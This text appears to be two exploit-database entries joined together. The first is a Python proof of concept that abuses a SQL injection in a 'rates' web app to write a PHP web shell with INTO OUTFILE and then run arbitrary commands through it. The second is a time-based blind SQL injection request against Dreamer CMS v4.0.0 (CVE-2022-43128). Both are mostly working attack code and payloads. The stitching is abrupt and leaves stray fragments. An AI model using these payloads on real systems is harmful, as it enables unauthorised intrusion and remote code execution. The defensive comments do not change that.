# write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.
# This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.
# Ex: python3 rcsv1.py 10.10.14.2 "ls"

"""Proof of concept for the issue described in the header comment.

Two HTTP GETs are issued: the first carries the SQL payload in the ``proId``
parameter of ``/rates/index.php?page=step1`` so that the database server writes
a PHP file under ``/rates/admin/DBbackup``; the second fetches that file with the
command in its query string and prints the response body.

For defenders, each step is a detection signal: ``UNION`` / ``INTO OUTFILE`` in
the ``proId`` parameter in the web server's access log, and a newly created
``.php`` file in the ``DBbackup`` directory.
"""

import sys, requests

def main() -> None:
    """Entry point: validate argv, write the PHP file, then run one command and print its output.

    Reads ``sys.argv[1]`` (target host/IP) and ``sys.argv[2]`` (command); exits
    with status -1 when the argument count is wrong.
    """
    if len(sys.argv) != 3:
        print("(+) usage: %s <target> <cmd>" % sys.argv[0])
        print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0])
        # Non-zero exit so a calling shell sees the usage error.
        sys.exit(-1)

    targetIP = sys.argv[1]
    cmd = sys.argv[2]
    # One session so both requests share connection state and any cookies the server sets.
    s = requests.Session()

    # Define obscure filename and command parameter to limit exposure and usage of the RCE.
    FILENAME = "youcantfindme.php"
    CMDVAR = "ohno"

    # Define the SQL injection string.
    # The UNION row is padded with empty strings to match the column count of the
    # original query, and INTO OUTFILE makes the database server write the row to the
    # web root. NOTE(review): presumably this only works when the DB account holds
    # MySQL's FILE privilege and secure_file_priv does not restrict the path — revoking
    # FILE for the application account and setting secure_file_priv are the
    # server-side mitigations, alongside parameterising the query in step1.php.
    sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)

    # Write the PHP file to disk using the SQL injection vulnerability.
    # NOTE(review): r1 is never inspected, so a failed write is only noticed when the
    # second request comes back as a 404 or with an empty body.
    url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)
    r1 = s.get(url1)

    # Execute the user defined command and display the result
    url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)
    r2 = s.get(url2)
    print(r2.text)

if __name__ == '__main__':
    main()
  25. # Exploit Title: Dreamer CMS v4.0.0 - SQL Injection
# Date: 2022/10/02
# Exploit Author: lvren
# Vendor Homepage: http://cms.iteachyou.cc/
# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip
# Version: v4.0.0
# CVE: CVE-2022-43128

Proof Of Concept (time-based blind injection through the key of the entity[...] parameter of the admin search form; the injected SLEEP(5) delays the response by about five seconds when the condition is evaluated):

POST /admin/search/doSearch HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/admin/search/doSearch
Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739
Upgrade-Insecure-Requests: 1

entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386

lvren
[email protected]
签名由 网易灵犀办公 定制